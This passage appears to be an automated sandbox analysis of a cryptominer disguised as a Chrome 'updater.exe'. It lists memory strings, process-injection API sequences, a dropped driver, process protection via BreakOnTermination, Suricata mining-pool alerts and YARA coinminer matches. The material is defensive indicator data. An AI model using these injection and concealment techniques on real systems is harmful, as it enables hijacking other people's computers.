Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDB source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC64BE3C FindFirstFileExW,	7_2_00000225DC64BE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6ABE3C FindFirstFileExW,	7_2_00000225DC6ABE3C
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AEBE3C FindFirstFileExW,	8_2_00000202C0AEBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A66130BE3C FindFirstFileExW,	9_2_000002A66130BE3C
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE29BE3C FindFirstFileExW,	10_2_000002BAAE29BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879CBE3C FindFirstFileExW,	11_2_0000026A879CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537ABE3C FindFirstFileExW,	12_2_00000179537ABE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D4BE3C FindFirstFileExW,	12_2_0000017953D4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D56BE3C FindFirstFileExW,	13_2_000002295D56BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E6BE3C FindFirstFileExW,	14_2_0000025306E6BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3BBE3C FindFirstFileExW,	15_2_000001845B3BBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD4BE3C FindFirstFileExW,	16_2_000001ADECD4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55907BE3C FindFirstFileExW,	17_2_000001D55907BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EABE3C FindFirstFileExW,	18_2_00000241A9EABE3C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3EBE3C FindFirstFileExW,	21_2_000002152C3EBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7319BE3C FindFirstFileExW,	24_2_000001CD7319BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E89BE3C FindFirstFileExW,	26_2_000002824E89BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8FBE3C FindFirstFileExW,	26_2_000002824E8FBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B3BE3C FindFirstFileExW,	27_2_0000021B47B3BE3C

Source: Network traffic	Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:51734 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49736 -> 45.76.89.70:80

Source: lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: powershell.exe, 00000005.00000002.1819640714.000001FA482FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000005.00000002.1819640714.000001FA482FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000008.00000002.2992018562.00000202C0256000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747836677.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 00000008.00000002.2986292449.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000008.00000000.1747836677.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2992018562.00000202C0200000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000008.00000000.1747440586.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2983352269.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000008.00000002.2992018562.00000202C0256000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747836677.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.
Source: lsass.exe, 00000008.00000002.2992018562.00000202C0256000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747836677.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000012.00000002.2989122565.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FC41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747440586.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2983352269.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0~
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FC41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1819526785.000001FA481B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000011.00000003.1846316422.000001D5599B5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process information set: 01 00 00 00			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process information set: 01 00 00 00			Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown

Source: C:\Windows\System32\dialer.exe	Code function: 4_2_00007FF78AB310C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,	4_2_00007FF78AB310C0
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC642A7C NtEnumerateValueKey,NtEnumerateValueKey,	7_2_00000225DC642A7C
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AE21CC NtQuerySystemInformation,StrCmpNIW,	8_2_00000202C0AE21CC
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AE26F0 NtQueryDirectoryFileEx,GetFileType,StrCpyW,	8_2_00000202C0AE26F0
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE292A7C NtEnumerateValueKey,NtEnumerateValueKey,	10_2_000002BAAE292A7C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3B23F0 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,	15_2_000001845B3B23F0
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3B21CC NtQuerySystemInformation,StrCmpNIW,	15_2_000001845B3B21CC

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

File created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys

Jump to behavior

Source: C:\Windows\System32\dialer.exe	Code function: 4_2_00007FF78AB314E4	4_2_00007FF78AB314E4
Source: C:\Windows\System32\dialer.exe	Code function: 4_2_00007FF78AB32328	4_2_00007FF78AB32328
Source: C:\Windows\System32\dialer.exe	Code function: 4_2_00007FF78AB326E8	4_2_00007FF78AB326E8
Source: C:\Windows\System32\dialer.exe	Code function: 4_2_00007FF78AB31DB4	4_2_00007FF78AB31DB4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD9B7F52FA	5_2_00007FFD9B7F52FA
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC621658	7_2_00000225DC621658
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC61B23C	7_2_00000225DC61B23C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC61F2F8	7_2_00000225DC61F2F8
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC61B030	7_2_00000225DC61B030
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6120DC	7_2_00000225DC6120DC
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC652258	7_2_00000225DC652258
